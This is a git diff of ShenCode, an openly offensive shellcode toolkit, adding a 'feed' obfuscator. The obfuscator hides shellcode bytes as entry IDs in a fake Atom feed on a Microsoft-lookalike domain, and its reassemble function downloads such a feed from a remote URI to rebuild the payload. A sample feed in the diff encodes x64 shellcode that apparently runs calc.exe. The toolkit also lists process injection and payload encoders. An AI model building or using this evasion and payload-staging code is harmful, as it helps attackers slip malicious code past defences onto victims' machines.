diff --git a/README.md b/README.md index 5076373..28d8147 100644 --- a/README.md +++ b/README.md @@ -2,26 +2,27 @@ **A versatile tool for working with shellcodes.** -![](shencode-060.png) +![|800](shencode-061.png) ## Features -### Version 0.6.0 +### Version 0.6.1 - general - - `extract` - [extract](https://github.com/psycore8/shencode/wiki/extract) from/to offset - - `formatout` - [display raw shellcodes](https://github.com/psycore8/shencode/wiki/formatout) in `C++, C#` and more - - `inject` - [inject shellcode](https://github.com/psycore8/shencode/wiki/inject) into process (Windows only) - - `msfvenom` - [create payloads](https://github.com/psycore8/shencode/wiki/msfvenom) with msfvenom + - `extract` - [extract](https://www.heckhausen.it/shencode/wiki/extract) from/to offset + - `formatout` - [display raw shellcodes](https://www.heckhausen.it/shencode/wiki/formatout) in `C++, C#` and more + - `inject` - [inject shellcode](https://www.heckhausen.it/shencode/wiki/inject) into process (Windows only) + - `msfvenom` - [create payloads](https://www.heckhausen.it/shencode/wiki/msfvenom) with msfvenom - encoder - - `aesenc` - [Encrypt](https://github.com/psycore8/shencode/wiki/aesenc) payload with AES - - `byteswap` - New XOR Encryption, [Swapping Bytes](https://github.com/psycore8/shencode/wiki/byteswap) ([Blog Post](https://www.nosociety.de/en:it-security:blog:obfuscation_byteswapping)) - - `xorenc` - [Encode payload](https://github.com/psycore8/shencode/wiki/xorenc) with custom XOR key - - `xorpoly` - [polymorphic x64](https://github.com/psycore8/shencode/wiki/xorpoly) in-memory decoder (for details, visit this [Blog Post](https://www.nosociety.de/en:it-security:blog:obfuscation_polymorphic_in_memory_decoder)) + - `aesenc` - [Encrypt](https://www.heckhausen.it/shencode/wiki/aesenc) payload with AES + - `byteswap` - New XOR Encryption, [Swapping Bytes](https://www.heckhausen.it/shencode/wiki/byteswap) ([Blog Post](https://www.nosociety.de/en:it-security:blog:obfuscation_byteswapping)) + - `xorenc` - [Encode payload](https://www.heckhausen.it/shencode/wiki/xorenc) with custom XOR key + - `xorpoly` - [polymorphic x64](https://www.heckhausen.it/shencode/wiki/xorpoly) in-memory decoder (for details, visit this [Blog Post](https://www.nosociety.de/en:it-security:blog:obfuscation_polymorphic_in_memory_decoder)) - obfuscator - - `QR-Code` hide OpCodes as [QR-Code image](https://github.com/psycore8/shencode/wiki/qrcode) - - `ROR13` to `ROL` [conversion with custom key](https://github.com/psycore8/shencode/wiki/ror2rol) (Windows only) - - `UUID` [obfuscation](https://github.com/psycore8/shencode/wiki/uuid) - Please, check out my [Blog Post](https://www.nosociety.de/en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen_-_teil_1) about this encoder + - `Feed` - Splits Bytes in a [feed.xml file](https://www.heckhausen.it/shencode/wiki/feed) as article IDs + - `QR-Code` hide OpCodes as [QR-Code image](https://www.heckhausen.it/shencode/wiki/qrcode) + - `ROR13` to `ROL` [conversion with custom key](https://www.heckhausen.it/shencode/wiki/ror2rol) (Windows only) + - `UUID` [obfuscation](https://www.heckhausen.it/shencode/wiki/uuid) - Please, check out my [Blog Post](https://www.nosociety.de/en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen_-_teil_1) about this encoder ## How to use @@ -29,21 +30,9 @@ Check out the [ShenCode Docs](https://heckhausen.it/shencode/wiki/) for more inf ## Release Notes -#### Improvements - -- `byteswap` - New XOR Encryption, Swapping Bytes -- `core` - Tested on Linux and Windows -- `core` - Output optimizations -- `core` - Better class implementations -- `core` - Fixed Linux import error -- `formatout` - Missing comma at EOL of C# output -- `formatout` - `--no-break` disable line break in output -- `extract` - Replaced `--first-byte` with `--start-offset` argument -- `extract` - Replaced `--last-byte` with `--end-offset` argument -- `extract` - Short arguments are `-so / -eo` -- `qrcode` - Fixed non functional implementation -- `xorpoly` - Code optimizations -- +- `feed` - A new obfuscation module +- `core` - added some different logos for startup + ## References - [Byte-Swapping](https://www.nosociety.de/en:it-security:blog:obfuscation_byteswapping) diff --git a/_dev.bat b/_dev.bat index b4bb3fc..f43aa1e 100644 --- a/_dev.bat +++ b/_dev.bat @@ -9,5 +9,5 @@ rem doskey shen-ror=python3.12 shencode.py ror2rol $* rem doskey shen-uid=python3.12 shencode.py uuid $* rem doskey shen-xop=python3.12 shencode.py xorpoly $* rem doskey shen-xoe=python3.12 shencode.py xorenc $* -doskey shc=python3.12 shencode.py $* +doskey shc=python shencode.py $* doskey /MACROS \ No newline at end of file diff --git a/feedtest.x b/feedtest.x new file mode 100644 index 0000000..81b2876 --- /dev/null +++ b/feedtest.x @@ -0,0 +1,235 @@ + + + + 2024-12-22 12:15:03.104716 + https://www.microloft.com/feed.xml + Developer News + The latest developer news from microloft.com + + Bill Ports + + + Title 1 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/554889e54883ec40 + + + Title 2 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/4831c0488945f848 + + + Title 3 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/8945f0488945e848 + + + Title 4 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/8945e0488945d848 + + + Title 5 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/8945d0488945c850 + + + Title 6 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/48b857696e457865 + + + Title 7 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/631148c1e00848c1 + + + Title 8 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/e80850488965d848 + + + Title 9 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/31c065488b406048 + + + Title 10 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/8b4018488b402048 + + + Title 11 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/8b18488b03488b40 + + + Title 12 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/204889c34831c98b + + + Title 13 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/433c4801d84831c9 + + + Title 14 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/80c1888b04084801 + + + Title 15 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/d88b481448894df8 + + + Title 16 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/8b481c4801d94889 + + + Title 17 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/4df08b48204801d9 + + + Title 18 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/48894de88b482448 + + + Title 19 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/01d948894de04831 + + + Title 20 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/c04831c9488b75d8 + + + Title 21 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/488b7de8fc8b3c87 + + + Title 22 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/4801dfb108f3a674 + + + Title 23 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/0948ffc0483b45f8 + + + Title 24 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/75e2488b4de0488b + + + Title 25 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/55f0668b04418b04 + + + Title 26 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/824801d84831d248 + + + Title 27 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/31c95148b963616c + + + Title 28 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/632e657865514889 + + + Title 29 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/e1b2014883e4f048 + + + Title 30 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/83ec20ffd04883c4 + + + Title 31 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/384883c4184883c4 + + + Title 32 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/085dc3 + + diff --git a/obfuscator/feed.py b/obfuscator/feed.py new file mode 100644 index 0000000..4b1f7b4 --- /dev/null +++ b/obfuscator/feed.py @@ -0,0 +1,99 @@ +import utils.arg +import datetime +import feedparser +from lxml import etree + +class feed_obfuscator: + Author = 'psycore8' + Description = 'obfuscate shellcodes as XML Feed' + Version = '1.0.0' + feed_fake_uri = 'https://www.microloft.com/' + feed_fake_title = 'Developer News' + feed_fake_subtitle = 'The latest developer news from microloft.com' + feed_fake_author = 'Bill Ports' + feed_fake_ids = [] + shellcode = '' + + def __init__(self, input_file, output_file, uri): + self.input_file = input_file + self.output_file = output_file + self.uri = uri + + + def init(): + spName = 'feed' + spArgList = [ + ['-i', '--input', '', '', 'Input file for feed obfucsation'], + ['-o', '--output', '', '', 'Output file for feed obfucsation'], + ['-r', '--reassemble', '', 'store_true', 'Reassemble fake feed to Shellcode'], + ['-u', '--uri', '', '', 'URI to fake feed'] + ] + utils.arg.CreateSubParser(spName, feed_obfuscator.Description, spArgList) + + def open_file(self): + try: + for b in open(self.input_file, 'rb').read(): + self.shellcode += b.to_bytes(1, 'big').hex() + return True + except FileNotFoundError: + return False + + def convert_bytes_to_fake_id(self, block_size=16): + s = self.shellcode.encode('utf-8') + self.feed_fake_ids.extend([s[i:i + block_size] for i in range(0, len(s), block_size)]) + #print(f'{self.feed_fake_ids}') + + + def generate_feed(self): + date_time = datetime.datetime.now() + root = etree.Element('feed') + + # Header + feed_link = etree.SubElement(root, 'link', attrib= + { + 'href': f'{self.feed_fake_uri}feed.xml', + 'rel': 'self', + 'type': 'application/atom+xml' + }) + feed_updated = etree.SubElement(root, 'updated') + feed_updated.text = f'{date_time}' + feed_id = etree.SubElement(root, 'id') + feed_id.text = f'{self.feed_fake_uri}feed.xml' + feed_title = etree.SubElement(root, 'title', attrib={'type': 'html'}) + feed_title.text = f'{self.feed_fake_title}' + feed_subtitle = etree.SubElement(root, 'subtitle') + feed_subtitle.text = f'{self.feed_fake_subtitle}' + feed_author = etree.SubElement(root, 'author') + feed_author_name = etree.SubElement(feed_author, 'name') + feed_author_name.text = f'{self.feed_fake_author}' + + # Entries + i = 1 + for id in self.feed_fake_ids: + entry = etree.SubElement(root, 'entry') + entry_title = etree.SubElement(entry, 'title', attrib={'type': 'html'}) + entry_title.text = f'Title {i}' + entry_link = etree.SubElement(entry, 'link', attrib={'href': f'{self.feed_fake_uri}0{i}/02/title{i}', 'rel': 'alternate', 'type': 'text/html', 'title': 'Title 1'}) + entry_published = etree.SubElement(entry, 'published') + entry_published.text = f'{date_time}' + entry_updated = etree.SubElement(entry, 'updated') + entry_updated.text = f'{date_time}' + entry_id = etree.SubElement(entry, 'id') + entry_id.text = f'{self.feed_fake_uri}{id.decode('utf-8')}' # 16 bytes part of shellcode + i += 1 + + xml_str = etree.tostring(root, pretty_print=True, xml_declaration=True, encoding="utf-8") + with open(self.output_file, "wb") as file: + file.write(xml_str) + + def reassemble_shellcode(self): + feed = feedparser.parse(self.uri) + for entry in feed.entries: + pos = entry.id.rfind('/') + self.shellcode += entry.id[pos + 1:] + #print(self.shellcode) + out_shellcode = bytes.fromhex(self.shellcode) + with open(self.output_file, 'wb') as file: + file.write(out_shellcode) + + diff --git a/requirements.txt b/requirements.txt index 08cfa18..00eb581 100644 Binary files a/requirements.txt and b/requirements.txt differ diff --git a/shencode-061.png b/shencode-061.png new file mode 100644 index 0000000..93ad53a Binary files /dev/null and b/shencode-061.png differ diff --git a/shencode.py b/shencode.py index 41bcae2..d3aff9e 100644 --- a/shencode.py +++ b/shencode.py @@ -6,6 +6,7 @@ import utils.extract as extract import utils.formatout as formatout import utils.hashes as hashes +import utils.header if os.name == 'nt': import utils.injection as injection import utils.msf as msf @@ -13,11 +14,12 @@ import encoder.byteswap as byteswap import encoder.xorpoly as xorpoly import encoder.xor as xor +import obfuscator.feed as feed import obfuscator.qrcode as qrcode import obfuscator.rolhash as rolhash import obfuscator.uuid as uuid -Version = '0.6.0' +Version = '0.6.1' # make sure your metasploit binary folder is in your PATH variable if os.name == 'nt': @@ -29,15 +31,9 @@ def main(command_line=None): print(f"{nstate.HEADER}") - print(f" _______ __ _______ __ ") - print(f" | _ | | |--. .-----. .-----. | _ | .-----. .--| | .-----.") - print(f" | 1___| | | | -__| | | |. 1___| | _ | | _ | | -__|") - print(f" |____ | |__|__| |_____| |__|__| |. |___ |_____| |_____| |_____|") - print(f" |: 1 | |: 1 | ") - print(f" |::.. . | |::.. . | ") - print(f" `-------\' `-------\' ") + print(f'{utils.header.get_header()}') print(f'Version {Version} by psycore8 -{nstate.ENDC} {nstate.TextLink('https://www.nosociety.de')}') - #print(f"Version {Version} by psycore8 -{nstate.ENDC} {nstate.LINK}https://www.nosociety.de{nstate.ENDC}") + ########################## ### BEGIN INIT SECTION ### @@ -51,6 +47,7 @@ def main(command_line=None): if os.name == 'nt': injection.inject.init() msf.msfvenom.init() + feed.feed_obfuscator.init() qrcode.qrcode_obfuscator.init() if os.name == 'nt': rolhash.ror2rol_obfuscator.init() @@ -143,6 +140,28 @@ def main(command_line=None): print(f"{nstate.OKBLUE} try to generate UUIDs") print(uuid_obf.CreateVar()) + elif arguments.command == 'feed': + feed_obf = feed.feed_obfuscator(arguments.input, arguments.output, arguments.uri) + + if feed_obf.uri: + feed_obf.reassemble_shellcode() + filecheck, outstrings = FileCheck.CheckSourceFile(feed_obf.output_file, 'OBF-RSS') + for string in outstrings: + print(string) + exit() + filecheck, outstrings = FileCheck.CheckSourceFile(feed_obf.input_file, 'OBF-RSS') + for string in outstrings: + print(string) + if filecheck: + feed_obf.open_file() + feed_obf.convert_bytes_to_fake_id() + feed_obf.generate_feed() + else: + exit() + filecheck, outstrings = FileCheck.CheckSourceFile(feed_obf.output_file, 'OBF-RSS') + for string in outstrings: + print(string) + elif arguments.command == 'qrcode': qr = qrcode.qrcode_obfuscator(arguments.input, arguments.output, '') filecheck, outstrings = FileCheck.CheckSourceFile(qr.input_file, 'OBF-QRC') diff --git a/utils/header.py b/utils/header.py new file mode 100644 index 0000000..14141c2 --- /dev/null +++ b/utils/header.py @@ -0,0 +1,62 @@ +import random + +header1 = """ + _______ __ _______ __ + | _ | | |--. .-----. .-----. | _ | .-----. .--| | .-----. + | 1___| | | | -__| | | |. 1___| | _ | | _ | | -__| + |____ | |__|__| |_____| |__|__| |. |___ |_____| |_____| |_____| + |: 1 | |: 1 | + |::.. . | |::.. . | + `-------\' `-------\' + """ + +header2 = """ + .dMMMb dMP dMP dMMMMMP dMMMMb .aMMMb .aMMMb dMMMMb dMMMMMP + dMP" VP dMP dMP dMP dMP dMP dMP"VMP dMP"dMP dMP VMP dMP + VMMMb dMMMMMP dMMMP dMP dMP dMP dMP dMP dMP dMP dMMMP +dP .dMP dMP dMP dMP dMP dMP dMP.aMP dMP.aMP dMP.aMP dMP +VMMMP" dMP dMP dMMMMMP dMP dMP VMMMP" VMMMP" dMMMMP" dMMMMMP +""" + +header3 = """ + .d8888b. 888 .d8888b. 888 +d88P Y88b 888 d88P Y88b 888 +Y88b. 888 888 888 888 + "Y888b. 88888b. .d88b. 88888b. 888 .d88b. .d88888 .d88b. + "Y88b. 888 "88b d8P Y8b 888 "88b 888 d88""88b d88" 888 d8P Y8b + "888 888 888 88888888 888 888 888 888 888 888 888 888 88888888 +Y88b d88P 888 888 Y8b. 888 888 Y88b d88P Y88..88P Y88b 888 Y8b. + "Y8888P" 888 888 "Y8888 888 888 "Y8888P" "Y88P" "Y88888 "Y8888 +""" + +header4 = """ + :::=== ::: === :::===== :::= === :::===== :::==== :::==== :::===== + ::: ::: === ::: :::===== ::: ::: === ::: === ::: + ===== ======== ====== ======== === === === === === ====== + === === === === === ==== === === === === === === + ====== === === ======== === === ======= ====== ======= ======== +""" + +header5 = """ + + ____ ___ ______ _______ ____ ________ ____ ______ +/ ___| |_ ||____ ||. __ | / ___||. ___ | |__ | |____ | +\\___ \\ |_| _ | | | | | || | | | | | | | _ | | + ___) | | | |_| | | _| || |___ | |___| | ____| | | | |_| +|____/ | | |_||___| \\____| |_______|/____/\\_\\ | | + |_| |_| +""" + +def get_header(): + rnd = random.randint(1, 5) + # print(f'{rnd}') + if rnd == 1: + return header1 + elif rnd == 2: + return header2 + elif rnd == 3: + return header3 + elif rnd == 4: + return header4 + elif rnd == 5: + return header5 \ No newline at end of file diff --git a/utils/msf.py b/utils/msf.py index 5525fa2..51eb043 100644 --- a/utils/msf.py +++ b/utils/msf.py @@ -3,9 +3,9 @@ class msfvenom: - Author = 'psycore8' - Description = 'Generate payloads with metasploit' - Version = '1.1.0' + Author = 'psycore8' + Description = 'Generate payloads with metasploit' + Version = '1.1.0' def __init__(self, command_line): self.command_line = command_line